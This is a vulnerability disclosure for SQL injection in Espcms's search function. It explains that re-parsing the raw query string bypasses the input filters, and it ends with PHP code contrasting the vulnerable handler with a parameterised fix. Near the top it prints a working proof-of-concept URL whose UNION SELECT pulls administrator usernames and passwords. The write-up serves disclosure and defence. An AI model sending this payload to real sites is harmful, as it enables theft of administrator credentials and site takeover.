SQL injection in the Espcms search function allows retrieval of the administrator password

The root cause is the same as the SQL injection in the wap module: variables are read directly from $_SERVER['QUERY_STRING'], which bypasses the filtering that is applied to the normal request parameters.

In the in_result function of /interface/search.php:

POC:

http://www.0day5.com/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23
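As an added illustration (not Espcms's own code), the vulnerable pattern described above beside a hardened version: re-parsing the raw query string discards whatever filtering was applied to $_GET, while a whitelisted column name plus a bound value cannot change the query structure. The request, table and column names are constructed for the example.

```php
<?php
// Added illustration, not Espcms code: why re-parsing $_SERVER['QUERY_STRING']
// bypasses filtering applied to $_GET, and what a fixed handler looks like.
// Table/column names are hypothetical; the request below is constructed.

$_SERVER['QUERY_STRING'] = 'keyword=1&attr[jobnum]=1%27%20or%201%3D1';
parse_str($_SERVER['QUERY_STRING'], $_GET);
// A CMS bootstrap filter would sanitise $_GET at this point; it never
// touches the raw query string, so anything re-read from there is unfiltered.

// Vulnerable pattern (the in_result bug class): read the raw query string
// again and concatenate both the attr[] key and its value into the SQL.
function search_vulnerable(): string {
    parse_str($_SERVER['QUERY_STRING'], $raw);      // filtered $_GET bypassed
    $where = [];
    foreach ($raw['attr'] ?? [] as $col => $val) {
        $where[] = "$col = '$val'";                   // key and value untrusted
    }
    return 'SELECT * FROM docs WHERE ' . implode(' AND ', $where);
}

// Hardened pattern: use $_GET only, whitelist the column name (identifiers
// cannot be bound parameters) and bind the value as a parameter.
function search_hardened(PDO $db): array {
    $allowed = ['jobnum', 'title'];                   // hypothetical attr columns
    $where = [];
    $params = [];
    foreach ((array)($_GET['attr'] ?? []) as $col => $val) {
        if (!in_array($col, $allowed, true)) {
            continue;                                 // unknown column: dropped
        }
        $where[] = "`$col` = :$col";
        $params[":$col"] = (string)$val;
    }
    $sql = 'SELECT * FROM docs' . ($where ? ' WHERE ' . implode(' AND ', $where) : '');
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// In-memory SQLite stands in for MySQL so the contrast runs offline.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE docs (id INTEGER, jobnum TEXT, title TEXT)');
$db->exec("INSERT INTO docs VALUES (1, '1', 'public'), (2, '2', 'internal')");

echo search_vulnerable(), PHP_EOL;   // the quote in attr[jobnum] ends up inside the WHERE clause
echo count(search_hardened($db)), " rows\n";   // 0: the value is compared literally
```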
